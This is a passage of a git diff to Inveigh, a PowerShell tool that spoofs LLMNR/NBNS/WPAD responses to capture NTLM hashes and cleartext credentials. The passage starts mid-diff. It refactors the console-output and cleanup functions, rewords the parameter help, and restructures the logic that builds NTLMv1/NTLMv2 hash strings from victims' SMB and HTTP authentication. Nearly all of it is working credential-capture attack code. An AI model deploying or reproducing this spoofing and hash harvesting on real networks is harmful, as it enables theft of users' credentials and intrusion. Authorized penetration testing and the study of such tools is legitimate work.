+ Write-Output $inveigh.NTLMv2_username_list
+}
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
- }
- elseif($Usernames)
- {
- Write-Output $inveigh.NTLMv2_username_list
- }
- else
- {
- Write-Output $inveigh.NTLMv2_list
- }
+if($Cleartext)
+{
+ Write-Output $inveigh.cleartext_list
+}
+if($CleartextUnique)
+{
+ Write-Output $inveigh.cleartext_list | Get-Unique
}
-function Get-InveighLog
+if($Learning)
{
- <#
- .SYNOPSIS
- Get-InveighLog will get log entries.
- #>
+ Write-Output $inveigh.valid_host_list
+}
- Write-Output $inveigh.log
}
function Watch-Inveigh
{
- <#
- .SYNOPSIS
- Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
- #>
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+#>
+
+if($inveigh.tool -ne 1)
+{
- if($inveigh.tool -ne 1)
+ if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
{
+ Write-Output "Press any key to stop real time console output"
+ $inveigh.console_output = $true
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+ :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- Write-Output "Press any key to stop real time console output"
- $inveigh.console_output = $true
- :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ while($inveigh.console_queue.Count -gt 0)
{
- while($inveigh.console_queue.Count -gt 0)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
+ switch -wildcard ($inveigh.console_queue[0])
{
-
- switch -wildcard ($inveigh.console_queue[0])
- {
- "Inveigh *exited *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* written to *"
- {
-
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
+ "* written to *"
+ {
- "* for relay *"
+ if($inveigh.file_output)
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
}
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ $inveigh.console_queue.RemoveAt(0)
+ }
- "* local administrator *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ "* for relay *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ "*SMB relay *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ "* local administrator *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
}
-
- }
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
}
+
+ }
- Start-Sleep -m 5
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
}
- }
- else
- {
- Write-Output "Inveigh isn't running"
+ Start-Sleep -m 5
}
}
else
{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+ Write-Output "Inveigh isn't running"
}
}
+else
+{
+ Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
function Clear-Inveigh
{
- <#
- .SYNOPSIS
- Clear-Inveigh will clear Inveigh data from memory.
- #>
-
- if($inveigh)
- {
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
- if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
- {
- Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
- }
- else
- {
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
- }
+if($inveigh)
+{
+ if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "Inveigh data has been cleared from memory"
}
+ else
+ {
+ Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+ }
+
+}
} \ No newline at end of file
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 0c1e638..1f43999 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -16,12 +16,12 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea
Run time control
.PARAMETER IP
-Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if
-the SpooferIP parameter is not set.
+Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the
+SpooferIP parameter is not set.
.PARAMETER SpooferIP
-Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a
-system other than the Inveigh host.
+IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other
+than the Inveigh host.
.PARAMETER SpooferHostsReply
Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
@@ -41,12 +41,12 @@ LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is recei
hostname to a spoofing blacklist.
.PARAMETER SpooferLearningDelay
-(Interger) Set the amount of time in minutes that Inveigh will delay spoofing while valid hosts are being
-blacklisted through SpooferLearning.
+(Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through
+SpooferLearning.
.PARAMETER SpooferLearningInterval
-Default = 30 Minutes: (Interger) Set the amount of time in minutes that Inveigh wait before sending out
-a LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled.
+Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out a LLMNR/NBNS request for a
+hostname that has already been checked if SpooferLearning is enabled.
.PARAMETER SpooferRepeat
Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
@@ -56,13 +56,13 @@ challenge/response has been captured.
Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
.PARAMETER LLMNRTTL
-Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet.
+Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
.PARAMETER NBNS
Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
.PARAMETER NBNSTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+Default = 165 Seconds: NBNS TTL in seconds for the response packet.
.PARAMETER NBNSTypes
Default = 00,20: Comma separated list of NBNS types to spoof.
@@ -78,38 +78,38 @@ the local store and attached to port 443. If the script does not exit gracefully
in the cert store.
.PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not
-apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016
-patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random
-hostnames and connecting to the root of the web server.
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to
+wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A
+WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and
+connecting to the root of the web server.
.PARAMETER HTTPBasicRealm
-Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
.PARAMETER HTTPDir
-Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
+Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
.PARAMETER HTTPDefaultFile
-Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used
-for wpad.dat requests.
+Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for
+wpad.dat requests.
.PARAMETER HTTPDefaultEXE
-Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
+EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
.PARAMETER HTTPResponse
-Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat
-requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
+String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
.PARAMETER HTTPSCertAppID
-Specify a valid application GUID for use with the ceriticate.
+Valid application GUID for use with the ceriticate.
.PARAMETER HTTPSCertThumbprint
-Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in
-the current working directory and named Inveigh.pfx.
+Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current
+working directory and named Inveigh.pfx.
.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests.
-Setting to Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
.PARAMETER WPADEmptyFile
Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
@@ -117,20 +117,20 @@ Enabling this setting can reduce the amount of redundant wpad.dat requests. This
using WPADIP, WPADPort, or WPADResponse.
.PARAMETER WPADIP
-Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
-must be used with WPADPort.
+Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
+with WPADPort.
.PARAMETER WPADPort
-Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
-must be used with WPADIP.
+Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
+used with WPADIP.
.PARAMETER WPADDirectHosts
Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
defined proxy.
.PARAMETER WPADResponse
-Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and
-WPADPort are set. Use PowerShell character escapes where necessary.
+wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort
+are set. Use PowerShell character escapes where necessary.
.PARAMETER SMB
Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still
@@ -138,8 +138,8 @@ direct targets to the host system's SMB server. Block TCP ports 445/139 or kill
prevent login requests from being processed by the Inveigh host.
.PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a
-random challenge will be generated for each request.
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request.
.PARAMETER MachineAccounts
Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
@@ -149,7 +149,7 @@ Default = Disabled: (Y/N) Enable/Disable real time console output. If using this
ensure that it doesn't hang the shell.
.PARAMETER ConsoleStatus
-(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
displaying full capture lists when running through a shell that does not have access to the support functions.
.PARAMETER ConsoleUnique
@@ -172,11 +172,11 @@ running Inveigh through a shell that does not return other output streams.Note t
yellow warning messages if enabled.
.PARAMETER OutputDir
-Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must
also be enabled.
.PARAMETER RunTime
-(Integer) Set the run time duration in minutes.
+(Integer) Run time duration in minutes.
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -238,51 +238,51 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile="Y",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM",
- [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes=@("00","20"),
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP="",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir="",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="",
- [parameter(Mandatory=$false)][Array]$SpooferHostsReply="",
- [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore="",
- [parameter(Mandatory=$false)][Array]$SpooferIPsReply="",
- [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore="",
- [parameter(Mandatory=$false)][Array]$WPADDirectHosts="",
- [parameter(Mandatory=$false)][Int]$ConsoleStatus="",
- [parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
- [parameter(Mandatory=$false)][Int]$NBNSTTL="165",
- [parameter(Mandatory=$false)][Int]$WPADPort="",
- [parameter(Mandatory=$false)][Int]$RunTime="",
- [parameter(Mandatory=$false)][Int]$SpooferLearningDelay="",
- [parameter(Mandatory=$false)][Int]$SpooferLearningInterval="30",
- [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS",
- [parameter(Mandatory=$false)][String]$HTTPDefaultFile="",
- [parameter(Mandatory=$false)][String]$HTTPDefaultEXE="",
- [parameter(Mandatory=$false)][String]$HTTPResponse="",
- [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF",
- [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
- [parameter(Mandatory=$false)][String]$WPADResponse="",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
+ [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
+ [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
+ [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
+ [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
+ [parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
+ [parameter(Mandatory=$false)][Int]$WPADPort = "",
+ [parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
+ [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
+ [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
+ [parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
+ [parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "",
+ [parameter(Mandatory=$false)][String]$HTTPResponse = "",
+ [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF",
+ [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+ [parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][Switch]$Inspect,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -381,12 +381,6 @@ if(!$inveigh.relay_running -or !$inveigh.unprivileged_running)
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
- $inveigh.HTTP_response = $HTTPResponse
- $inveigh.HTTP_directory = $HTTPDir
- $inveigh.HTTP_default_file = $HTTPDefaultFile
- $inveigh.HTTP_default_exe = $HTTPDefaultEXE
- $inveigh.WPAD_response = $WPADResponse
- $inveigh.challenge = $Challenge
}
$inveigh.running = $true
@@ -456,14 +450,14 @@ $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null
if($LLMNR -eq 'Y')
{
- $inveigh.status_queue.Add("LLMNR Spoofing = Enabled") > $null
+ $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
$inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
- $LLMNR_response_message = "- spoofed response has been sent"
+ $LLMNR_response_message = "- response sent"
}
else
{
- $inveigh.status_queue.Add("LLMNR Spoofing = Disabled") > $null
- $LLMNR_response_message = "- LLMNR spoofing is disabled"
+ $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null
+ $LLMNR_response_message = "- LLMNR spoofer is disabled"
}
if($NBNS -eq 'Y')
@@ -472,20 +466,20 @@ if($NBNS -eq 'Y')
if($NBNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output = Enabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output = Enabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
}
$inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
- $NBNS_response_message = "- spoofed response has been sent"
+ $NBNS_response_message = "- response sent"
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofing = Disabled") > $null
- $NBNS_response_message = "- NBNS spoofing is disabled"
+ $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null
+ $NBNS_response_message = "- NBNS spoofer is disabled"
}
if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
@@ -518,26 +512,22 @@ if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",") > $null
-}
-else
-{
- $SpooferHostsReply = $false
+ $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
}
if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Ignoring requests for " + $SpooferHostsIgnore -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
}
if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofing requests from " + $SpooferIPsReply -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null
}
if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Ignoring requests from " + $SpooferIPsIgnore -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
}
if($SpooferRepeat -eq 'N')
@@ -562,11 +552,11 @@ else
if($HTTP -eq 'Y')
{
- $HTTP_port_check = netstat -ap TCP | findstr 0.0.0.0:80
+ $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80
if($HTTP_port_check)
{
- $inveigh.HTTP = $true
+ $inveigh.HTTP = $false
$inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null
}
else
@@ -585,7 +575,7 @@ else
if($HTTPS -eq 'Y')
{
- $HTTPS_port_check = netstat -ap TCP | findstr 0.0.0.0:443
+ $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443
if($HTTPS_port_check)
{
@@ -669,24 +659,24 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
$WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
}
- $inveigh.WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
- $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null
+ $WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
+ $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
else
{
- $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
}
}
elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
{
$inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
- $inveigh.WPAD_response = $WPADResponse
+ $WPADResponse = $WPADResponse
}
elseif($WPADEmptyFile -eq 'Y')
{
$inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null
- $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}"
+ $WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}"
}
if($Challenge)
@@ -775,7 +765,6 @@ elseif($RunTime -gt 1)
if($ShowHelp -eq 'Y')
{
- $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null
$inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null
if($inveigh.console_output)
@@ -799,7 +788,7 @@ if($inveigh.status_output)
else
{
- switch ($inveigh.status_queue[0])
+ switch -Wildcard ($inveigh.status_queue[0])
{
"* Disabled Due To *"
@@ -933,7 +922,7 @@ $SMB_NTLM_functions_scriptblock =
$host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes
$NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes
- if ($NTLM_length -gt 24)
+ if($NTLM_length -gt 24)
{
$NTLMv2_response = $NTLM_response.Insert(32,':')
$NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response
@@ -962,9 +951,16 @@ $SMB_NTLM_functions_scriptblock =
{
$inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
}
+
+ if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
+ {
+ $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+ }
+
}
+
}
- else
+ elseif($NTLM_length -eq 24)
{
$NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $LM_response + ":" + $NTLM_response + ":" + $NTLM_challenge
@@ -992,13 +988,16 @@ $SMB_NTLM_functions_scriptblock =
{
$inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
}
+
+ if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
+ {
+ $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+ }
+
}
- }
- if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
- {
- $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
}
+
}
}
@@ -1008,20 +1007,21 @@ $SMB_NTLM_functions_scriptblock =
# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
$HTTP_scriptblock =
{
- param ($HTTPAuth,$HTTPBasicRealm,$WPADAuth)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$WPADAuth,$WPADResponse)
function NTLMChallengeBase64
{
+ param ([String]$Challenge)
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
$HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- if($inveigh.challenge)
+ if($Challenge)
{
- $HTTP_challenge = $inveigh.challenge
- $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge = $Challenge
+ $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
else
@@ -1085,8 +1085,9 @@ $HTTP_scriptblock =
}
$HTTP_request_time = Get-Date -format 's'
+ $HTTP_source_IP = $inveigh.request.RemoteEndpoint.Address.IPAddressToString
